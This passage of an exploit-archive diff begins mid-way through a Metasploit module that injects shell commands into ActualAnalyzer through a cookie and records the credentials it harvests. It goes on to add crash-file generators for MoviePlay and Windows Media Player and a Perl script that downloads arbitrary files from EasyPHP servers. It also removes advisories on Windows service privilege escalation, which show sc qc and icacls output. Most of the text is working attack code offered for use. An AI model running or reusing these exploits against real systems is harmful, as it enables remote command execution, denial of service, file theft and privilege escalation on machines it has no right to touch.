'uname' => user,
'passw' => pass,
'id_h' => '',
'listp' => '',
'act_h' => '',
'oldact' => 'pages',
'tint_h' => '',
'extact_h' => '',
'param_h' => '',
'param2_h' => '',
'home_pos' => '',
'act' => 'dynhtml',
'set.x' => '11',
'set.y' => '11'
}
)
if !res
vprint_error("#{peer} - Connection failed")
elsif res.code == 200 && res.body =~ />Login</
vprint_status("#{peer} - Login failed.")
elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
print_good("#{peer} - Login successful! (#{user}:#{pass})")
service_data = {
address: Rex::Socket.getaddress(rhost, true),
port: rport,
service_name: (ssl ? 'https' : 'http'),
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
private_type: :password,
private_data: pass,
username: user
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
return analytics_host
else
vprint_status("#{peer} - Could not find any hosts on admin.php")
end
nil
end
def execute_command(cmd, opts = { analytics_host: vhost })
vuln_cookies = %w(anw anm)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'aa.php'),
'vars_get' => { 'anp' => opts[:analytics_host] },
'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
)
if !res
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
print_good("#{peer} - Payload sent successfully")
return true
elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
elsif res.code == 200 && res.body =~ /Admin area<\/title>/
fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
else
fail_with(Failure::Unknown, "#{peer} - Something went wrong")
end
nil
end
def exploit
return unless check == Exploit::CheckCode::Vulnerable
analytics_hosts = []
if datastore['ANALYZER_HOST'].blank?
analytics_hosts << get_analytics_host_code
analytics_hosts << get_analytics_host_view
analytics_hosts << get_analytics_host_admin
analytics_hosts << vhost
analytics_hosts << '127.0.0.1'
analytics_hosts << 'localhost'
else
analytics_hosts << datastore['ANALYZER_HOST']
end
analytics_hosts.uniq.each do |host|
next if host.nil?
vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
break if execute_command(payload.encoded, analytics_host: host)
end
end
end

57
platforms/windows/dos/35552.py Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/47111/info
MoviePlay is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
MoviePlay 4.82 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link: http://www.movieplay.org/download.php
#(+)Software : Movie Player
#(+)Version : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
print " _______________________________________________________________________";
print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";
print "(+) Software Link: http://www.movieplay.org/download.php";
print "(+) Software : Movie Player";
print "(+) Version : v4.82";
print "(+) Tested On : WIN-XP SP3";
print "(+) Date : 31.03.2011";
print "(+) Hour : 13:37 PM ";
print "____________________________________________________________________\n ";
import time
time.sleep (2);
print "\nGenerating the exploit file !!!";
time.sleep (2);
print "\n\nMoviePlayerExploit.avi file generated!!";
time.sleep (2);
ExploitLocation = "C:\\MoviePlayerExploit.avi"
f = open(ExploitLocation, "wb")
memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';
f.write(memoryloc)
f.close()
print "\n\n(+) Done!\n";
print "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n";
print "(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n";
time.sleep (2);
time.sleep (1);
print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n";
print "(+)^Xecuti0N3r: E-mail \n";
print "(+)d3M0l!tioN3r: E-mail \n";
print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n";
print "########################################################################\n\n";
time.sleep (4);

56
platforms/windows/dos/35553.pl Executable file
View file

@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/47112/info
Microsoft Windows Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Microsoft Windows Media Player 11.0.5721.5145 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software : Windows Media player
#(+)Version : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
(+) Software : Windows Media player
(+) Version : 11.0.5721.5145
(+) Tested On : WIN-XP SP3
(+) Date : 31.03.2011
(+) Hour : 13:37 PM
____________________________________________________________________\n ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nWMPExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
open(file, "> WMPExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";
sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");

47
platforms/windows/local/35512.txt
View file

@ -1,47 +0,0 @@
# Exploit Title:mobilis 3g mobiconnect 3G++ ZDServer 1.0.1.2 Service Trusted Path Privilege Escalation
# Date: 07/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.3G.dz/ http://www.mobilis.dz/
#Affected version: 1.0.1.2
#Tested on: Windows 7 (FR)
# Thanks Rachid Ben elkharchi
mobilis 3g mobiconnect 3G++
'ZDServ.exe'
service for Windows. This could potentially allow an authorized but
non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path
undetected by the OS or other security applications where it could
potentially be executed during application startup or reboot. If
successful, the local users code would execute with the elevated
privileges of the application.
C:\Users\samir>sc qc ZDServ
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: ZDServ
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ZDServ
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Program Files\Hostless Modem\MOBICONNECT\ZDServSetup\ZDServ.exe Tout le monde:(I)(F)
AUTORITE NT\SystŠme:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traitsÿ; chec du traitement de 0 fichiers

38
platforms/windows/local/35534.txt
View file

@ -1,38 +0,0 @@
# Exploit Title: HTCSyncManager 3.1.33.0 (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
# Date: 12/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
#Affected version: 3.1.33.0
#Tested on: Windows 7 (FR)
HTC Synchronisation manager for devices HTC
Vulnerability Details
There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change
the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.
C:\Users\samir>sc qc HTCMonitorService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: HTCMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HTCMonitorService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers

37
platforms/windows/local/35537.txt
View file

@ -1,37 +0,0 @@
# Exploit Title: Avira 14.0.7.342 (avguard.exe) Service Trusted Path Privilege Escalation
# Date: 11/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.avira.com/
#Affected version: 14.0.7.342
#Tested on: Windows 7 (FR)
Avira free antivirus 14.0.7.342
(avguard.exe)
Avira free antivirus 14.0.7.342 contains a flaw in the 'avguard.exe' file that may reportedly allow gaining access to unauthorized privileges.
The issue is due to an unquoted search path, which may allow a local attacker
to inject arbitrary code in the root path.
C:\Users\samir>sc qc AntiVirService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AntiVirService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Avira Real-Time Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
C:\Program Files\Avira\AntiVir Desktop\avguard.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers

41
platforms/windows/local/35542.txt
View file

@ -1,41 +0,0 @@
# Exploit Title:CodeMeter 4.50.906.503 Service Trusted Path Privilege Escalation
# Date: 07/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.wibu.com/fr/codemeter.html
#Affected version: 4.50.906.503
#Tested on: Windows 7 (FR)
'CodeMeter.exe '
CodeMeter represents the basic technology of all protection and licensing solutions from Wibu-Systems.
CodeMeter contains a flaw in the 'CodeMeter.exe'
file that may reportedly allow gaining access to unauthorized privileges.
The issue is due to an unquoted search path, which may allow a local attacker
to inject arbitrary code in the root path.
C:\Users\samir>sc qc CodeMeter.exe
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: CodeMeter.exe
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CodeMeter Runtime Server
DEPENDENCIES : Tcpip
: Winmgmt
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe"
C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers

82
platforms/windows/remote/35563.pl Executable file
View file

@ -0,0 +1,82 @@
source: http://www.securityfocus.com/bid/47145/info
EasyPHP is prone to a vulnerability that lets attackers to download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Content/Download File
# Tested on : Windows XP SP3 Fran?ais
# Target : EasyPHP 5.3.5.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# EasyPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 1e");
system("cls");
sleep(1);
# Start Exploit : ** Allah Akbar **
use LWP::Simple;
if (@ARGV < 3) {
print("\r\n");
print("=================================================================\r\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n");
print(" [!] Usage: " .$0. " <host> <port> <file>\r\n");
print(" [!] HOST - An host using EasyPHP Web Server\r\n");
print(" [!] PORT - Port number\r\n");
print(" [!] FILE - The file you want to get\r\n");
print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n");
print("=================================================================\r\n\r\n");
sleep(1);
exit(1);
# ** Allah Akbar **
} else {
print("=================================================================\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n\r\n");
sleep(2);
($host, $port, $file) = @ARGV;
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
print(" [+] File Content:\r\n\r\n");
sleep(2);
print($content. "\r\n");
open (KDZ ,">","KedAns.log");
print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" .
"Greets All Hackers Moslems & All My Friends \r\n" .
"Target : http://$host:$port/$file \r\n" .
"File Content : \n\n" .
"=============================\r\n\n" .
"$content";
print("\r\n");
print("=================================================================\n");
print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";
}
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================